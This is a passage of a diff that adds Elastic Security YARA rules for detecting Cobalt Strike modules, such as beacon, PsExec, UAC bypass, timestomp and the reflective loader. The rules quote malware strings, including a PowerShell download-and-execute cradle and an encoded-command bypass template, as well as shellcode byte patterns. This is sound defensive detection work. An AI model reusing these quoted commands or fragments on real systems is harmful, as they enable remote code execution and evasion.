     442 + $a5 = "IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:%u/')" ascii fullword
     443 + $a6 = "%s.2%08x%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     444 + $a7 = "could not run command (w/ token) because of its length of %d bytes!" ascii fullword
     445 + $a8 = "%s.2%08x%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     446 + $a9 = "%s.2%08x%08x%08x%08x%08x.%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     447 + $a10 = "powershell -nop -exec bypass -EncodedCommand \"%s\"" ascii fullword
     448 + $a11 = "Could not open service control manager on %s: %d" ascii fullword
     449 + $a12 = "%d is an x64 process (can't inject x86 content)" ascii fullword
     450 + $a13 = "%d is an x86 process (can't inject x64 content)" ascii fullword
     451 + $a14 = "Failed to impersonate logged on user %d (%u)" ascii fullword
     452 + $a15 = "could not create remote thread in %d: %d" ascii fullword
     453 + $a16 = "%s.1%08x%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     454 + $a17 = "could not write to process memory: %d" ascii fullword
     455 + $a18 = "Could not create service %s on %s: %d" ascii fullword
     456 + $a19 = "Could not delete service %s on %s: %d" ascii fullword
     457 + $a20 = "Could not open process token: %d (%u)" ascii fullword
     458 + $a21 = "%s.1%08x%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     459 + $a22 = "Could not start service %s on %s: %d" ascii fullword
     460 + $a23 = "Could not query service %s on %s: %d" ascii fullword
     461 + $a24 = "Could not connect to pipe (%s): %d" ascii fullword
     462 + $a25 = "%s.1%08x%08x%08x%08x%08x.%x%x.%s" ascii fullword
     463 + $a26 = "could not spawn %s (token): %d" ascii fullword
     464 + $a27 = "could not open process %d: %d" ascii fullword
     465 + $a28 = "could not run %s as %s\\%s: %d" ascii fullword
     466 + $a29 = "%s.1%08x%08x%08x%08x.%x%x.%s" ascii fullword
     467 + $a30 = "kerberos ticket use failed:" ascii fullword
     468 + $a31 = "Started service %s on %s" ascii fullword
     469 + $a32 = "%s.1%08x%08x%08x.%x%x.%s" ascii fullword
     470 + $a33 = "I'm already in SMB mode" ascii fullword
     471 + $a34 = "could not spawn %s: %d" ascii fullword
     472 + $a35 = "could not open %s: %d" ascii fullword
     473 + $a36 = "%s.1%08x%08x.%x%x.%s" ascii fullword
     474 + $a37 = "Could not open '%s'" ascii fullword
     475 + $a38 = "%s.1%08x.%x%x.%s" ascii fullword
     476 + $a39 = "%s as %s\\%s: %d" ascii fullword
     477 + $a40 = "%s.1%x.%x%x.%s" ascii fullword
     478 + $a41 = "beacon.x64.dll" ascii fullword
     479 + $a42 = "%s on %s: %d" ascii fullword
     480 + $a43 = "www6.%x%x.%s" ascii fullword
     481 + $a44 = "cdn.%x%x.%s" ascii fullword
     482 + $a45 = "api.%x%x.%s" ascii fullword
     483 + $a46 = "%s (admin)" ascii fullword
     484 + $a47 = "beacon.dll" ascii fullword
     485 + $a48 = "%s%s: %s" ascii fullword
     486 + $a49 = "@%d.%s" ascii fullword
     487 + $a50 = "%02d/%02d/%02d %02d:%02d:%02d" ascii fullword
     488 + $a51 = "Content-Length: %d" ascii fullword
     489 + condition:
     490 + 6 of ($a*)
     491 +}
     492 + 
     493 +rule Windows_Trojan_CobaltStrike_9c0d5561 {
     494 + meta:
     495 + author = "Elastic Security"
     496 + id = "9c0d5561-5b09-44ae-8e8c-336dee606199"
     497 + fingerprint = "01d53fcdb320f0cd468a2521c3e96dcb0b9aa00e7a7a9442069773c6b3759059"
     498 + creation_date = "2021-03-23"
     499 + last_modified = "2021-10-04"
     500 + description = "Identifies PowerShell Runner module from Cobalt Strike"
     501 + threat_name = "Windows.Trojan.CobaltStrike"
     502 + severity = 100
     503 + arch_context = "x86"
     504 + scan_context = "file, memory"
     505 + license = "Elastic License v2"
     506 + os = "windows"
     507 + strings:
     508 + $a1 = "PowerShellRunner.dll" wide fullword
     509 + $a2 = "powershell.x64.dll" ascii fullword
     510 + $a3 = "powershell.dll" ascii fullword
     511 + $a4 = "\\\\.\\pipe\\powershell" ascii fullword
     512 + $b1 = "PowerShellRunner.PowerShellRunner" ascii fullword
     513 + $b2 = "Failed to invoke GetOutput w/hr 0x%08lx" ascii fullword
     514 + $b3 = "Failed to get default AppDomain w/hr 0x%08lx" ascii fullword
     515 + $b4 = "ICLRMetaHost::GetRuntime (v4.0.30319) failed w/hr 0x%08lx" ascii fullword
     516 + $b5 = "CustomPSHostUserInterface" ascii fullword
     517 + $b6 = "RuntimeClrHost::GetCurrentAppDomainId failed w/hr 0x%08lx" ascii fullword
     518 + $b7 = "ICorRuntimeHost::GetDefaultDomain failed w/hr 0x%08lx" ascii fullword
     519 + $c1 = { 8B 08 50 FF 51 08 8B 7C 24 1C 8D 4C 24 10 51 C7 }
     520 + $c2 = "z:\\devcenter\\aggressor\\external\\PowerShellRunner\\obj\\Release\\PowerShellRunner.pdb" ascii fullword
     521 + condition:
     522 + (1 of ($a*) and 4 of ($b*)) or 1 of ($c*)
     523 +}
     524 + 
     525 +rule Windows_Trojan_CobaltStrike_59ed9124 {
     526 + meta:
     527 + author = "Elastic Security"
     528 + id = "59ed9124-bc20-4ea6-b0a7-63ee3359e69c"
     529 + fingerprint = "7823e3b98e55a83bf94b0f07e4c116dbbda35adc09fa0b367f8a978a80c2efff"
     530 + creation_date = "2021-03-23"
     531 + last_modified = "2021-08-23"
     532 + description = "Identifies PsExec module from Cobalt Strike"
     533 + threat_name = "Windows.Trojan.CobaltStrike"
     534 + severity = 100
     535 + arch_context = "x86"
     536 + scan_context = "file, memory"
     537 + license = "Elastic License v2"
     538 + os = "windows"
     539 + strings:
     540 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\psexec_command.x64.o" ascii fullword
     541 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\psexec_command.x86.o" ascii fullword
     542 + $b1 = "__imp_BeaconDataExtract" ascii fullword
     543 + $b2 = "__imp_BeaconDataParse" ascii fullword
     544 + $b3 = "__imp_BeaconDataParse" ascii fullword
     545 + $b4 = "__imp_BeaconDataParse" ascii fullword
     546 + $b5 = "__imp_ADVAPI32$StartServiceA" ascii fullword
     547 + $b6 = "__imp_ADVAPI32$DeleteService" ascii fullword
     548 + $b7 = "__imp_ADVAPI32$QueryServiceStatus" ascii fullword
     549 + $b8 = "__imp_ADVAPI32$CloseServiceHandle" ascii fullword
     550 + $c1 = "__imp__BeaconDataExtract" ascii fullword
     551 + $c2 = "__imp__BeaconDataParse" ascii fullword
     552 + $c3 = "__imp__BeaconDataParse" ascii fullword
     553 + $c4 = "__imp__BeaconDataParse" ascii fullword
     554 + $c5 = "__imp__ADVAPI32$StartServiceA" ascii fullword
     555 + $c6 = "__imp__ADVAPI32$DeleteService" ascii fullword
     556 + $c7 = "__imp__ADVAPI32$QueryServiceStatus" ascii fullword
     557 + $c8 = "__imp__ADVAPI32$CloseServiceHandle" ascii fullword
     558 + condition:
     559 + 1 of ($a*) or 5 of ($b*) or 5 of ($c*)
     560 +}
     561 + 
     562 +rule Windows_Trojan_CobaltStrike_8a791eb7 {
     563 + meta:
     564 + author = "Elastic Security"
     565 + id = "8a791eb7-dc0c-4150-9e5b-2dc21af0c77d"
     566 + fingerprint = "4967886ba5e663f2e2dc0631939308d7d8f2194a30590a230973e1b91bd625e1"
     567 + creation_date = "2021-03-23"
     568 + last_modified = "2021-08-23"
     569 + description = "Identifies Registry module from Cobalt Strike"
     570 + threat_name = "Windows.Trojan.CobaltStrike"
     571 + severity = 100
     572 + arch_context = "x86"
     573 + scan_context = "file, memory"
     574 + license = "Elastic License v2"
     575 + os = "windows"
     576 + strings:
     577 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\registry.x64.o" ascii fullword
     578 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\registry.x86.o" ascii fullword
     579 + $b1 = "__imp_ADVAPI32$RegOpenKeyExA" ascii fullword
     580 + $b2 = "__imp_ADVAPI32$RegEnumKeyA" ascii fullword
     581 + $b3 = "__imp_ADVAPI32$RegOpenCurrentUser" ascii fullword
     582 + $b4 = "__imp_ADVAPI32$RegCloseKey" ascii fullword
     583 + $b5 = "__imp_BeaconFormatAlloc" ascii fullword
     584 + $b6 = "__imp_BeaconOutput" ascii fullword
     585 + $b7 = "__imp_BeaconFormatFree" ascii fullword
     586 + $b8 = "__imp_BeaconDataPtr" ascii fullword
     587 + $c1 = "__imp__ADVAPI32$RegOpenKeyExA" ascii fullword
     588 + $c2 = "__imp__ADVAPI32$RegEnumKeyA" ascii fullword
     589 + $c3 = "__imp__ADVAPI32$RegOpenCurrentUser" ascii fullword
     590 + $c4 = "__imp__ADVAPI32$RegCloseKey" ascii fullword
     591 + $c5 = "__imp__BeaconFormatAlloc" ascii fullword
     592 + $c6 = "__imp__BeaconOutput" ascii fullword
     593 + $c7 = "__imp__BeaconFormatFree" ascii fullword
     594 + $c8 = "__imp__BeaconDataPtr" ascii fullword
     595 + condition:
     596 + 1 of ($a*) or 5 of ($b*) or 5 of ($c*)
     597 +}
     598 + 
     599 +rule Windows_Trojan_CobaltStrike_d00573a3 {
     600 + meta:
     601 + author = "Elastic Security"
     602 + id = "d00573a3-db26-4e6b-aabf-7af4a818f383"
     603 + fingerprint = "b6fa0792b99ea55f359858d225685647f54b55caabe53f58b413083b8ad60e79"
     604 + creation_date = "2021-03-23"
     605 + last_modified = "2021-08-23"
     606 + description = "Identifies Screenshot module from Cobalt Strike"
     607 + threat_name = "Windows.Trojan.CobaltStrike"
     608 + severity = 100
     609 + arch_context = "x86"
     610 + scan_context = "file, memory"
     611 + license = "Elastic License v2"
     612 + os = "windows"
     613 + strings:
     614 + $a1 = "screenshot.x64.dll" ascii fullword
     615 + $a2 = "screenshot.dll" ascii fullword
     616 + $a3 = "\\\\.\\pipe\\screenshot" ascii fullword
     617 + $b1 = "1I1n1Q3M5Q5U5Y5]5a5e5i5u5{5" ascii fullword
     618 + $b2 = "GetDesktopWindow" ascii fullword
     619 + $b3 = "CreateCompatibleBitmap" ascii fullword
     620 + $b4 = "GDI32.dll" ascii fullword
     621 + $b5 = "ReflectiveLoader"
     622 + $b6 = "Adobe APP14 marker: version %d, flags 0x%04x 0x%04x, transform %d" ascii fullword
     623 + condition:
     624 + 2 of ($a*) or 5 of ($b*)
     625 +}
     626 + 
     627 +rule Windows_Trojan_CobaltStrike_7bcd759c {
     628 + meta:
     629 + author = "Elastic Security"
     630 + id = "7bcd759c-8e3d-4559-9381-1f4fe8b3dd95"
     631 + fingerprint = "553085f1d1ca8dcd797360b287951845753eee7370610a1223c815a200a5ed20"
     632 + creation_date = "2021-03-23"
     633 + last_modified = "2021-08-23"
     634 + description = "Identifies SSH Agent module from Cobalt Strike"
     635 + threat_name = "Windows.Trojan.CobaltStrike"
     636 + severity = 100
     637 + arch_context = "x86"
     638 + scan_context = "file, memory"
     639 + license = "Elastic License v2"
     640 + os = "windows"
     641 + strings:
     642 + $a1 = "sshagent.x64.dll" ascii fullword
     643 + $a2 = "sshagent.dll" ascii fullword
     644 + $b1 = "\\\\.\\pipe\\sshagent" ascii fullword
     645 + $b2 = "\\\\.\\pipe\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ascii fullword
     646 + condition:
     647 + 1 of ($a*) and 1 of ($b*)
     648 +}
     649 + 
     650 +rule Windows_Trojan_CobaltStrike_a56b820f {
     651 + meta:
     652 + author = "Elastic Security"
     653 + id = "a56b820f-0a20-4054-9c2d-008862646a78"
     654 + fingerprint = "5418e695bcb1c37e72a7ff24a39219dc12b3fe06c29cedefd500c5e82c362b6d"
     655 + creation_date = "2021-03-23"
     656 + last_modified = "2021-08-23"
     657 + description = "Identifies Timestomp module from Cobalt Strike"
     658 + threat_name = "Windows.Trojan.CobaltStrike"
     659 + severity = 100
     660 + arch_context = "x86"
     661 + scan_context = "file, memory"
     662 + license = "Elastic License v2"
     663 + os = "windows"
     664 + strings:
     665 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\timestomp.x64.o" ascii fullword
     666 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\timestomp.x86.o" ascii fullword
     667 + $b1 = "__imp_KERNEL32$GetFileTime" ascii fullword
     668 + $b2 = "__imp_KERNEL32$SetFileTime" ascii fullword
     669 + $b3 = "__imp_KERNEL32$CloseHandle" ascii fullword
     670 + $b4 = "__imp_KERNEL32$CreateFileA" ascii fullword
     671 + $b5 = "__imp_BeaconDataExtract" ascii fullword
     672 + $b6 = "__imp_BeaconPrintf" ascii fullword
     673 + $b7 = "__imp_BeaconDataParse" ascii fullword
     674 + $b8 = "__imp_BeaconDataExtract" ascii fullword
     675 + $c1 = "__imp__KERNEL32$GetFileTime" ascii fullword
     676 + $c2 = "__imp__KERNEL32$SetFileTime" ascii fullword
     677 + $c3 = "__imp__KERNEL32$CloseHandle" ascii fullword
     678 + $c4 = "__imp__KERNEL32$CreateFileA" ascii fullword
     679 + $c5 = "__imp__BeaconDataExtract" ascii fullword
     680 + $c6 = "__imp__BeaconPrintf" ascii fullword
     681 + $c7 = "__imp__BeaconDataParse" ascii fullword
     682 + $c8 = "__imp__BeaconDataExtract" ascii fullword
     683 + condition:
     684 + 1 of ($a*) or 5 of ($b*) or 5 of ($c*)
     685 +}
     686 + 
     687 +rule Windows_Trojan_CobaltStrike_92f05172 {
     688 + meta:
     689 + author = "Elastic Security"
     690 + id = "92f05172-f15c-4077-a958-b8490378bf08"
     691 + fingerprint = "09b1f7087d45fb4247a33ae3112910bf5426ed750e1e8fe7ba24a9047b76cc82"
     692 + creation_date = "2021-03-23"
     693 + last_modified = "2021-08-23"
     694 + description = "Identifies UAC cmstp module from Cobalt Strike"
     695 + threat_name = "Windows.Trojan.CobaltStrike"
     696 + severity = 100
     697 + arch_context = "x86"
     698 + scan_context = "file, memory"
     699 + license = "Elastic License v2"
     700 + os = "windows"
     701 + strings:
     702 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uaccmstp.x64.o" ascii fullword
     703 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uaccmstp.x86.o" ascii fullword
     704 + $b1 = "elevate_cmstp" ascii fullword
     705 + $b2 = "$pdata$elevate_cmstp" ascii fullword
     706 + $b3 = "$unwind$elevate_cmstp" ascii fullword
     707 + $c1 = "_elevate_cmstp" ascii fullword
     708 + $c2 = "__imp__OLE32$CoGetObject@16" ascii fullword
     709 + $c3 = "__imp__KERNEL32$GetModuleFileNameA@12" ascii fullword
     710 + $c4 = "__imp__KERNEL32$GetSystemWindowsDirectoryA@8" ascii fullword
     711 + $c5 = "OLDNAMES"
     712 + $c6 = "__imp__BeaconDataParse" ascii fullword
     713 + $c7 = "_willAutoElevate" ascii fullword
     714 + condition:
     715 + 1 of ($a*) or 3 of ($b*) or 4 of ($c*)
     716 +}
     717 + 
     718 +rule Windows_Trojan_CobaltStrike_417239b5 {
     719 + meta:
     720 + author = "Elastic Security"
     721 + id = "417239b5-cf2d-4c85-a022-7a8459c26793"
     722 + fingerprint = "292afee829e838f9623547f94d0561e8a9115ce7f4c40ae96c6493f3cc5ffa9b"
     723 + creation_date = "2021-03-23"
     724 + last_modified = "2021-08-23"
     725 + description = "Identifies UAC token module from Cobalt Strike"
     726 + threat_name = "Windows.Trojan.CobaltStrike"
     727 + severity = 100
     728 + arch_context = "x86"
     729 + scan_context = "file, memory"
     730 + license = "Elastic License v2"
     731 + os = "windows"
     732 + strings:
     733 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken.x64.o" ascii fullword
     734 + $a2 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken.x86.o" ascii fullword
     735 + $a3 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken2.x64.o" ascii fullword
     736 + $a4 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\uactoken2.x86.o" ascii fullword
     737 + $b1 = "$pdata$is_admin_already" ascii fullword
     738 + $b2 = "$unwind$is_admin" ascii fullword
     739 + $b3 = "$pdata$is_admin" ascii fullword
     740 + $b4 = "$unwind$is_admin_already" ascii fullword
     741 + $b5 = "$pdata$RunAsAdmin" ascii fullword
     742 + $b6 = "$unwind$RunAsAdmin" ascii fullword
     743 + $b7 = "is_admin_already" ascii fullword
     744 + $b8 = "is_admin" ascii fullword
     745 + $b9 = "process_walk" ascii fullword
     746 + $b10 = "get_current_sess" ascii fullword
     747 + $b11 = "elevate_try" ascii fullword
     748 + $b12 = "RunAsAdmin" ascii fullword
     749 + $b13 = "is_ctfmon" ascii fullword
     750 + $c1 = "_is_admin_already" ascii fullword
     751 + $c2 = "_is_admin" ascii fullword
     752 + $c3 = "_process_walk" ascii fullword
     753 + $c4 = "_get_current_sess" ascii fullword
     754 + $c5 = "_elevate_try" ascii fullword
     755 + $c6 = "_RunAsAdmin" ascii fullword
     756 + $c7 = "_is_ctfmon" ascii fullword
     757 + $c8 = "_reg_query_dword" ascii fullword
     758 + $c9 = ".drectve" ascii fullword
     759 + $c10 = "_is_candidate" ascii fullword
     760 + $c11 = "_SpawnAsAdmin" ascii fullword
     761 + $c12 = "_SpawnAsAdminX64" ascii fullword
     762 + condition:
     763 + 1 of ($a*) or 9 of ($b*) or 7 of ($c*)
     764 +}
     765 + 
     766 +rule Windows_Trojan_CobaltStrike_29374056 {
     767 + meta:
     768 + author = "Elastic Security"
     769 + id = "29374056-03ce-484b-8b2d-fbf75be86e27"
     770 + fingerprint = "4cd7552a499687ac0279fb2e25722f979fc5a22afd1ea4abba14a2ef2002dd0f"
     771 + creation_date = "2021-03-23"
     772 + last_modified = "2021-08-23"
     773 + description = "Identifies Cobalt Strike MZ Reflective Loader."
     774 + threat_name = "Windows.Trojan.CobaltStrike"
     775 + severity = 100
     776 + arch_context = "x86"
     777 + scan_context = "file, memory"
     778 + license = "Elastic License v2"
     779 + os = "windows"
     780 + strings:
     781 + $a1 = { 4D 5A 41 52 55 48 89 E5 48 81 EC 20 00 00 00 48 8D 1D ?? FF FF FF 48 81 C3 ?? ?? 00 00 FF D3 }
     782 + $a2 = { 4D 5A E8 00 00 00 00 5B 89 DF 52 45 55 89 E5 }
     783 + condition:
     784 + 1 of ($a*)
     785 +}
     786 + 
     787 +rule Windows_Trojan_CobaltStrike_949f10e3 {
     788 + meta:
     789 + author = "Elastic Security"
     790 + id = "949f10e3-68c9-4600-a620-ed3119e09257"
     791 + fingerprint = "34e04901126a91c866ebf61a61ccbc3ce0477d9614479c42d8ce97a98f2ce2a7"
     792 + creation_date = "2021-03-25"
     793 + last_modified = "2021-08-23"
     794 + description = "Identifies the API address lookup function used by Cobalt Strike along with XOR implementation by Cobalt Strike."
     795 + threat_name = "Windows.Trojan.CobaltStrike"
     796 + severity = 100
     797 + arch_context = "x86"
     798 + scan_context = "file, memory"
     799 + license = "Elastic License v2"
     800 + os = "windows"
     801 + strings:
     802 + $a1 = { 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 AC 3C 61 }
     803 + $a2 = { 8B 07 01 C3 85 C0 75 E5 58 C3 E8 [2] FF FF 31 39 32 2E 31 36 38 2E ?? 2E }
     804 + condition:
     805 + all of them
     806 +}
     807 + 
     808 +rule Windows_Trojan_CobaltStrike_8751cdf9 {
     809 + meta:
     810 + author = "Elastic Security"
     811 + id = "8751cdf9-4038-42ba-a6eb-f8ac579a4fbb"
     812 + fingerprint = "0988386ef4ba54dd90b0cf6d6a600b38db434e00e569d69d081919cdd3ea4d3f"
     813 + creation_date = "2021-03-25"
     814 + last_modified = "2021-08-23"
     815 + description = "Identifies Cobalt Strike wininet reverse shellcode along with XOR implementation by Cobalt Strike."
     816 + threat_name = "Windows.Trojan.CobaltStrike"
     817 + severity = 99
     818 + arch_context = "x86"
     819 + scan_context = "file, memory"
     820 + license = "Elastic License v2"
     821 + os = "windows"
     822 + strings:
     823 + $a1 = { 68 6E 65 74 00 68 77 69 6E 69 54 68 4C 77 26 07 }
     824 + $a2 = { 8B 07 01 C3 85 C0 75 E5 58 C3 E8 [2] FF FF 31 39 32 2E 31 36 38 2E ?? 2E }
     825 + condition:
     826 + all of them
     827 +}
     828 + 
     829 +rule Windows_Trojan_CobaltStrike_8519072e {
     830 + meta:
     831 + author = "Elastic Security"
     832 + id = "8519072e-3e43-470b-a3cf-18f92b3f31a2"
     833 + fingerprint = "9fc88b798083adbcf25f9f0b35fbb5035a98cdfe55377de96fa0353821de1cc8"
     834 + creation_date = "2021-03-25"
     835 + last_modified = "2021-10-04"
     836 + description = "Identifies Cobalt Strike trial/default versions"
     837 + threat_name = "Windows.Trojan.CobaltStrike"
     838 + severity = 90
     839 + arch_context = "x86"
     840 + scan_context = "file, memory"
     841 + license = "Elastic License v2"
     842 + os = "windows"
     843 + strings:
     844 + $a1 = "User-Agent:"
     845 + $a2 = "wini"
     846 + $a3 = "5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" ascii fullword
     847 + $a4 = /[^0-9";.\/]([0-9]{1,3}\.){3}[0-9]{1,3}[^0-9";.\/]/
     848 + condition:
     849 + all of them
     850 +}
     851 + 
     852 +rule Windows_Trojan_CobaltStrike_663fc95d {
     853 + meta:
     854 + author = "Elastic Security"
     855 + id = "663fc95d-2472-4d52-ad75-c5d86cfc885f"
     856 + fingerprint = "d0f781d7e485a7ecfbbfd068601e72430d57ef80fc92a993033deb1ddcee5c48"
     857 + creation_date = "2021-04-01"
     858 + last_modified = "2021-12-17"
     859 + description = "Identifies CobaltStrike via unidentified function code"
     860 + threat_name = "Windows.Trojan.CobaltStrike"
     861 + severity = 100
     862 + arch_context = "x86"
     863 + scan_context = "file, memory"
     864 + license = "Elastic License v2"
     865 + os = "windows"
     866 + strings:
     867 + $a = { 48 89 5C 24 08 57 48 83 EC 20 48 8B 59 10 48 8B F9 48 8B 49 08 FF 17 33 D2 41 B8 00 80 00 00 }
     868 + condition:
     869 + all of them
     870 +}
     871 + 
     872 +rule Windows_Trojan_CobaltStrike_b54b94ac {
     873 + meta:
     874 + author = "Elastic Security"
     875 + id = "b54b94ac-6ef8-4ee9-a8a6-f7324c1974ca"
     876 + fingerprint = "2344dd7820656f18cfb774a89d89f5ab65d46cc7761c1f16b7e768df66aa41c8"
     877 + creation_date = "2021-10-21"
     878 + last_modified = "2022-01-13"
     879 + description = "Rule for beacon sleep obfuscation routine"
     880 + threat_name = "Windows.Trojan.CobaltStrike"
     881 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     882 + severity = 100
     883 + arch_context = "x86"
     884 + scan_context = "file, memory"
     885 + license = "Elastic License v2"
     886 + os = "windows"
     887 + strings:
     888 + $a_x64 = { 4C 8B 53 08 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 75 05 45 85 DB 74 33 45 3B CB 73 E6 49 8B F9 4C 8B 03 }
     889 + $a_x64_smbtcp = { 4C 8B 07 B8 4F EC C4 4E 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 38 10 42 30 0C 06 48 }
     890 + $a_x86 = { 8B 46 04 8B 08 8B 50 04 83 C0 08 89 55 08 89 45 0C 85 C9 75 04 85 D2 74 23 3B CA 73 E6 8B 06 8D 3C 08 33 D2 }
     891 + $a_x86_2 = { 8B 06 8D 3C 08 33 D2 6A 0D 8B C1 5B F7 F3 8A 44 32 08 30 07 41 3B 4D 08 72 E6 8B 45 FC EB C7 }
     892 + $a_x86_smbtcp = { 8B 07 8D 34 08 33 D2 6A 0D 8B C1 5B F7 F3 8A 44 3A 08 30 06 41 3B 4D 08 72 E6 8B 45 FC EB }
     893 + condition:
     894 + any of them
     895 +}
     896 + 
     897 +rule Windows_Trojan_CobaltStrike_f0b627fc {
     898 + meta:
     899 + author = "Elastic Security"
     900 + id = "f0b627fc-97cd-42cb-9eae-1efb0672762d"
     901 + fingerprint = "fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1"
     902 + creation_date = "2021-10-21"
     903 + last_modified = "2022-01-13"
     904 + description = "Rule for beacon reflective loader"
     905 + threat_name = "Windows.Trojan.CobaltStrike"
     906 + reference_sample = "b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b"
     907 + severity = 100
     908 + arch_context = "x86"
     909 + scan_context = "file, memory"
     910 + license = "Elastic License v2"
     911 + os = "windows"
     912 + strings:
     913 + $beacon_loader_x64 = { 25 FF FF FF 00 3D 41 41 41 00 75 [5-10] 25 FF FF FF 00 3D 42 42 42 00 75 }
     914 + $beacon_loader_x86 = { 25 FF FF FF 00 3D 41 41 41 00 75 [4-8] 81 E1 FF FF FF 00 81 F9 42 42 42 00 75 }
     915 + $beacon_loader_x86_2 = { 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 [4-8] 81 E2 FF FF FF 00 81 FA 42 42 42 00 75 }
     916 + $generic_loader_x64 = { 89 44 24 20 48 8B 44 24 40 0F BE 00 8B 4C 24 20 03 C8 8B C1 89 44 24 20 48 8B 44 24 40 48 FF C0 }
     917 + $generic_loader_x86 = { 83 C4 04 89 45 FC 8B 4D 08 0F BE 11 03 55 FC 89 55 FC 8B 45 08 83 C0 01 89 45 08 8B 4D 08 0F BE }
     918 + condition:
     919 + any of them
     920 +}
     921 + 
     922 +rule Windows_Trojan_CobaltStrike_dcdcdd8c {
     923 + meta:
     924 + author = "Elastic Security"
     925 + id = "dcdcdd8c-7395-4453-a74a-60ab8e251a5a"
     926 + fingerprint = "8aed1ae470d06a7aac37896df22b2f915c36845099839a85009212d9051f71e9"
     927 + creation_date = "2021-10-21"
     928 + last_modified = "2022-01-13"
     929 + description = "Rule for beacon sleep PDB"
     930 + threat_name = "Windows.Trojan.CobaltStrike"
     931 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     932 + severity = 100
     933 + arch_context = "x86"
     934 + scan_context = "file, memory"
     935 + license = "Elastic License v2"
     936 + os = "windows"
     937 + strings:
     938 + $a1 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask.x64.o" ascii fullword
     939 + $a2 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask.x86.o" ascii fullword
     940 + $a3 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_smb.x64.o" ascii fullword
     941 + $a4 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_smb.x86.o" ascii fullword
     942 + $a5 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_tcp.x64.o" ascii fullword
     943 + $a6 = "Z:\\devcenter\\aggressor\\external\\sleepmask\\bin\\sleepmask_tcp.x86.o" ascii fullword
     944 + condition:
     945 + any of them
     946 +}
     947 + 
     948 +rule Windows_Trojan_CobaltStrike_a3fb2616 {
     949 + meta:
     950 + author = "Elastic Security"
     951 + id = "a3fb2616-b03d-4399-9342-0fc684fb472e"
     952 + fingerprint = "c15cf6aa7719dac6ed21c10117f28eb4ec56335f80a811b11ab2901ad36f8cf0"
     953 + creation_date = "2021-10-21"
     954 + last_modified = "2022-01-13"
     955 + description = "Rule for browser pivot "
     956 + threat_name = "Windows.Trojan.CobaltStrike"
     957 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     958 + severity = 100
     959 + arch_context = "x86"
     960 + scan_context = "file, memory"
     961 + license = "Elastic License v2"
     962 + os = "windows"
     963 + strings:
     964 + $a1 = "browserpivot.dll" ascii fullword
     965 + $a2 = "browserpivot.x64.dll" ascii fullword
     966 + $b1 = "$$$THREAD.C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$" ascii fullword
     967 + $b2 = "COBALTSTRIKE" ascii fullword
     968 + condition:
     969 + 1 of ($a*) and 2 of ($b*)
     970 +}
     971 + 
     972 +rule Windows_Trojan_CobaltStrike_8ee55ee5 {
     973 + meta:
     974 + author = "Elastic Security"
     975 + id = "8ee55ee5-67f1-4f94-ab93-62bb5cfbeee9"
     976 + fingerprint = "7e7ed4f00d0914ce0b9f77b6362742a9c8b93a16a6b2a62b70f0f7e15ba3a72b"
     977 + creation_date = "2021-10-21"
     978 + last_modified = "2022-01-13"
     979 + description = "Rule for wmi exec module"
     980 + threat_name = "Windows.Trojan.CobaltStrike"
     981 + reference_sample = "36d32b1ed967f07a4bd19f5e671294d5359009c04835601f2cc40fb8b54f6a2a"
     982 + severity = 100
     983 + arch_context = "x86"
     984 + scan_context = "file, memory"
     985 + license = "Elastic License v2"
     986 + os = "windows"
     987 + strings:
     988 + $a1 = "Z:\\devcenter\\aggressor\\external\\pxlib\\bin\\wmiexec.x64.o" ascii fullword
     989 + $a2 = "z:\\devcenter\\aggressor\\external\\pxlib\\bin\\wmiexec.x86.o" ascii fullword
     990 + condition:
     991 + 1 of ($a*)
     992 +}
     993 + 
     994 +rule Windows_Trojan_CobaltStrike_8d5963a2 {
     995 + meta:
     996 + author = "Elastic Security"
     997 + id = "8d5963a2-54a9-4705-9f34-0d5f8e6345a2"
     998 + fingerprint = "228cd65380cf4b04f9fd78e8c30c3352f649ce726202e2dac9f1a96211925e1c"
     999 + creation_date = "2022-08-10"
     1000 + last_modified = "2022-09-29"
     1001 + threat_name = "Windows.Trojan.CobaltStrike"
